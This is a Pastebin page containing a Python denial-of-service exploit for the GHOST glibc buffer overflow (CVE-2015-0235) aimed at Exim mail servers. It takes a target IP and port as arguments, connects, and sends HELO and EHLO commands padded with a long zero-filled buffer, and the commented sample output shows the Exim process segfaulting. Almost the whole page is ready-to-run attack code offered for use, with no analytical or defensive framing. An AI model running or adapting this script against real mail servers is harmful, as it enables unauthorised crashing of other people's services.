Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # Exim ESMTP DoS Exploit by 1N3 v20150128
- # CVE-2015-0235 GHOST glibc gethostbyname buffer overflow
- # http://crowdshield.com
- #
- # USAGE: python ghost-smtp-dos.py <ip> <port>
- #
- # Escape character is '^]'.
- # 220 debian-7-7-64b ESMTP Exim 4.80 ...
- # HELO
- #
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 0000000000000000000000000000
- 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000
- # Connection closed by foreign host.
- #
- # user () debian-7-7-64b:~$ dmesg
- # ...
- # [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in
- # libc-2.13.so[7fabef2a2000+182000]
- import socket
- import time
- import sys, getopt
- def main(argv):
- argc = len(argv)
- if argc <= 1:
- print "usage: %s <host>" % (argv[0])
- sys.exit(0)
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- buffer =
- "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 0000000000000000000000
- 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000"
- target = argv[1] # SET TARGET
- port = argv[2] # SET PORT
- print "(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com"
- print "(--==== Sending GHOST SMTP DoS to " + target + ":" + port + " with length:"
- +str(len(buffer))
- s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- connect=s.connect((target,int(port)))
- data = s.recv(1024)
- print "CONNECTION: " +data
- s.send('HELO ' + buffer + '\r\n')
- data = s.recv(1024)
- print "received: " +data
- s.send('EHLO ' + buffer + '\r\n')
- data = s.recv(1024)
- print "received: " +data
- s.close()
- main(sys.argv)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement